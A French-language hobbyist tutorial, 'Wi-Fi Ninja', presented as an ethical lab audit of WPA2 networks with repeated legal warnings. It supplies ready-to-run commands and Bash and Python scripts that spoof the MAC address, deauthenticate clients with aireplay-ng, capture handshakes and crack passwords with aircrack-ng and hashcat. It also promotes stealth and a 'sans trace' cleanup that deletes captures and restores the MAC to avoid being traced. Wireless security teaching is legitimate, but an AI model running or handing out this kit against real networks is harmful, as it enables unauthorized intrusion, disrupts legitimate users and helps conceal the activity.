⚖️ Charte Éthique Apache
Yo, Apache membre ! Voici le Wi-Fi Ninja, par Platon-y pour pctamalou.fr. Ce tuto guide un audit Wi-Fi éthique en lab sécurisé pour tester la robustesse des réseaux. Lab uniquement – interdit hors réseau autorisé (article 323-1 Code pénal : 7 ans prison, 100 000 € amende). Soyez prudents, hackez safe !
Wi-Fi Ninja 📡🔐
Exclusivité membres : réalisez un audit Wi-Fi éthique en lab sécurisé avec aircrack-ng, macchanger et scripts automatisés. Furtif, éducatif, sans trace. Devenez un cyber-ninja ! 100% légal ! 🔥
🔰 Pour les Novices : C’est quoi un audit Wi-Fi ?
👉 Bienvenue, jeune Apache ! Ce tuto t’apprend à tester la sécurité d’un réseau Wi-Fi en lab sécurisé. Voici les bases :
Lexique du Cyber-Ninja
Pourquoi un audit ? Tester la robustesse de son propre réseau ou d’un réseau autorisé pour identifier les failles (ex. : mot de passe faible).
Éthique ? Uniquement sur votre réseau ou avec autorisation écrite. Hors lab = illégal (article 323-1 CP).
1️⃣ Introduction au Wi-Fi Ninja 📡
Le Wi-Fi Ninja est un projet DIY par Platon-y pour pctamalou.fr. Ce tuto guide un audit Wi-Fi éthique en lab sécurisé : scan des réseaux, capture de handshake WPA2, attaque par dictionnaire, et cleanup furtif. Lab-only, pas d’usage réel !
()_()
( •_•)>⌐■-■
(■_■)
_____
/ 🔪 \ ___ WIFI NINJA
/ / ⚡ \ \ / _ \ LAB MODE
| | 📡 | || (__) |
\ \_🔐_/ / \___/
\_____/
Objectifs
- Scanner les réseaux Wi-Fi avec aircrack-ng.
- Spoofer l’adresse MAC pour rester furtif.
- Capturer un handshake WPA2.
- Tenter une attaque par dictionnaire.
- Automatiser avec un script Python/Bash.
- Nettoyer les traces (logs, MAC).
2️⃣ Setup du Lab 🔧
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Configurez un lab sécurisé pour réaliser l’audit Wi-Fi.
📥 Préparation pour Débutants
👉 Vous avez besoin d’une machine virtuelle et d’un routeur de test.
- Installer Kali Linux: Téléchargez une VM préconfigurée (apache-lab.ova) ou installez Kali sur VirtualBox/VMware.
- Configurer un routeur de test: Utilisez un routeur dédié (ex. : TP-Link TL-WR841N) en WPA2-PSK.
- Activer le mode bridge: Connectez la VM au réseau du routeur via un adaptateur Wi-Fi USB.
- Vérifiez l’environnement: Pas de réseaux sensibles à proximité. Cage de Faraday optionnelle.
Docker Alternative
<!-- Dockerfile -->
FROM kalilinux/kali-rolling
RUN apt update && apt install -y aircrack-ng macchanger python3 tshark
WORKDIR /lab
COPY wifi_audit.sh .
# Build & Run
docker build -t wifi-ninja .
docker run -it --net=host --privileged wifi-ninja bash
+-----------------------------------------------+
| [Lab Isolé] |
| | |
| v |
| [VM Kali Linux : apache-lab.ova] |
| | |
| [Routeur de Test : WPA2-PSK] |
| | |
| [Adaptateur Wi-Fi : Alfa AWUS036NHA] |
| | |
| [Sécurité : Pas de réseaux sensibles] |
+-----------------------------------------------+
Checklist Sécurité
| Élément | Statut | Action |
|---|---|---|
| Kali Linux | ☐ Installé | Téléchargez apache-lab.ova ou installez Kali. |
| Adaptateur Wi-Fi | ☐ Compatible | Vérifiez monitor mode (iwconfig). |
| Routeur de test | ☐ Configuré | WPA2-PSK, SSID personnalisé. |
| NetworkManager | ☐ Désactivé | sudo systemctl stop NetworkManager. |
| Environnement | ☐ Sécurisé | Pas de réseaux sensibles à proximité. |
3️⃣ Matériel & Logiciels Nécessaires 🛠️
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Voici tout ce qu’il faut pour l’audit Wi-Fi.
Liste des Composants
| Élément | Description | Quantité | Prix (approx.) | Source |
|---|---|---|---|---|
| Adaptateur Wi-Fi | Alfa AWUS036NHA (monitor mode) | 1 | 35 € | Amazon, eBay |
| Routeur de test | TP-Link TL-WR841N | 1 | 20 € | Amazon |
| PC/VM | Kali Linux (8GB RAM recommandé) | 1 | Gratuit | pctamalou.fr |
| Total | - | - | ~55 € | - |
Logiciels Requis
- Kali Linux (aircrack-ng, macchanger, python3, tshark).
- Wordlist (ex. : rockyou.txt, top_100_passwords.txt).
- VirtualBox/VMware ou Docker.
4️⃣ Audit Wi-Fi Pas-à-Pas 📡
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Suivez chaque étape pour auditer un réseau Wi-Fi de test.
Étape 1 : Préparer l’Interface
- Désactiver NetworkManager :
sudo systemctl stop NetworkManager - Spoofer l’adresse MAC :
sudo macchanger -r wlan0 - Activer le mode monitor :
sudo airmon-ng start wlan0 - Vérifiez: iwconfig wlan0mon (mode monitor).
Étape 2 : Scanner les Réseaux
- Lancer airodump-ng :
sudo airodump-ng wlan0mon - Notez le BSSID, canal, et SSID du réseau de test (ex. : BSSID=00:11:22:33:44:55, Canal=6, SSID=TestWiFi).
- Vérifiez: Arrêtez avec Ctrl+C, pas de réseaux sensibles scannés.
Étape 3 : Capturer un Handshake
- Lancer airodump-ng sur le réseau cible :
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon - Déconnecter un client (dans un autre terminal) :
sudo aireplay-ng -0 10 -a 00:11:22:33:44:55 wlan0mon - Vérifiez: Handshake capturé (message "WPA handshake" en haut à droite dans airodump-ng).
Étape 4 : Attaque par Dictionnaire
- Lancer aircrack-ng :
sudo aircrack-ng -w /wordlists/top_100.txt -b 00:11:22:33:44:55 capture-01.cap - Vérifiez: Si mot de passe trouvé, notez-le (ex. : "password123"). Sinon, essayez une wordlist plus grande.
Étape 5 : Nettoyage
- Arrêter le mode monitor :
sudo airmon-ng stop wlan0mon - Restaurer l’adresse MAC :
sudo macchanger -p wlan0 - Supprimer les fichiers :
sudo rm -f capture*.cap capture*.csv capture*.netxml - Vérifiez: Aucun log persistant (ls -la).
5️⃣ Script Automatisé 🐍
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Voici un script Bash avec menu interactif pour automatiser l’audit.
<!-- wifi_audit.sh -->
#!/bin/bash
echo "[+] Wi-Fi Ninja - Mode Lab Only !"
INTERFACE="wlan0"
cleanup() {
sudo airmon-ng stop ${INTERFACE}mon
sudo macchanger -p $INTERFACE
sudo rm -f *.cap *.csv *.netxml
echo "[+] Nettoyage terminé."
}
trap cleanup EXIT
echo "[1] Spoofer MAC"
echo "[2] Scanner réseaux"
echo "[3] Capturer handshake"
echo "[4] Attaque dictionnaire"
read -p "Choix : " choice
case $choice in
1) sudo macchanger -r $INTERFACE ;;
2) sudo airmon-ng start $INTERFACE
sudo airodump-ng ${INTERFACE}mon ;;
3) read -p "BSSID : " bssid
read -p "Canal : " channel
sudo airmon-ng start $INTERFACE
sudo airodump-ng -c $channel --bssid $bssid -w capture ${INTERFACE}mon &
sleep 2
sudo aireplay-ng -0 10 -a $bssid ${INTERFACE}mon ;;
4) read -p "BSSID : " bssid
sudo aircrack-ng -w /wordlists/top_100.txt -b $bssid capture-01.cap ;;
esac
Et un script Python avec gestion d’erreurs :
<!-- wifi_audit.py -->
import subprocess
import os
def run_cmd(cmd):
try:
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
print(result.stdout)
except Exception as e:
print(f"[ERREUR] {e}")
def capture_handshake(bssid, channel, interface="wlan0mon"):
run_cmd(f"airodump-ng -c {channel} --bssid {bssid} -w capture {interface} &")
run_cmd(f"aireplay-ng -0 10 -a {bssid} {interface}")
if __name__ == "__main__":
os.system("airmon-ng start wlan0")
bssid = input("BSSID : ")
channel = input("Canal : ")
capture_handshake(bssid, channel)
Utilisation :
chmod +x wifi_audit.sh
./wifi_audit.sh
python3 wifi_audit.py
6️⃣ Sécurité & Éthique 🛡️
⚠️ NE PAS FAIRE EN VRAI – Lab only, sinon prison + amende !
Risques
- Légal: Audit non autorisé = infraction (article 323-1 CP).
- Interférences: Déconnexion de clients peut perturber des réseaux légitimes.
- Traces: Logs ou MAC non nettoyés peuvent être tracés.
Précautions
# Avant chaque test
- Vérifiez que le réseau est le vôtre ou autorisé.
- Spoofer l’adresse MAC (macchanger -r wlan0).
- Désactiver NetworkManager (systemctl stop NetworkManager).
- Utiliser une VM ou conteneur isolé.
- Nettoyer les traces (rm -f *.cap *.csv *.netxml).
Recyclage
Supprimez les fichiers de capture et restaurez l’état initial de la machine (MAC, services).
7️⃣ Bonus : Pimper l’Audit 🔥
Pour les Apaches créatifs, voici des idées :
- GUI Tkinter: Créez une interface graphique pour le script Python (pip install tkinter).
- Wordlist Custom: Générez avec crunch (ex. : crunch 8 8 -t password@@).
- Hashcat: Testez le handshake avec hashcat :
hashcat -m 22000 capture.hc22000 /wordlists/top_100.txt - Scapy Analyse: Analysez les paquets capturés :
<!-- scapy_analyse.py --> from scapy.all import * packets = rdpcap("capture.pcap") for pkt in packets: if pkt.haslayer(Dot11Beacon): print(f"SSID: {pkt.info.decode()} - BSSID: {pkt.addr2}")
❓ FAQ Apache 🔥
Q: Je suis novice, c’est faisable ?
A: Oui, suivez les étapes et utilisez la VM apache-lab.ova. Regardez des tutos aircrack-ng sur YouTube.
Q: Mon adaptateur ne passe pas en monitor mode ?
A: Vérifiez la compatibilité (ex. : Alfa AWUS036NHA) et les drivers (iwconfig).
Q: C’est légal ?
A: Seulement sur votre réseau ou avec autorisation écrite. Hors lab = illégal (article 323-1 CP).
Q: Pas de handshake capturé ?
A: Augmentez les déconnexions (-0 20) ou vérifiez le canal/BSSID.
Q: Où trouver des wordlists ?
A: Téléchargez sur le web ou utilisez rockyou.txt.
🏁 Conclusion & Remerciements
Yo, Apache ! 🎉 Tu viens de maîtriser un audit Wi-Fi éthique comme un vrai cyber-ninja. T’as appris à scanner, capturer, attaquer, et nettoyer, tout en restant safe et légal! 💖
Ce qu’on a appris :
- Scanner les réseaux avec aircrack-ng.
- Spoofer une adresse MAC.
- Capturer un handshake WPA2.
- Automatiser avec Python/Bash.
- Nettoyer les traces.
- Rester éthique (lab-only).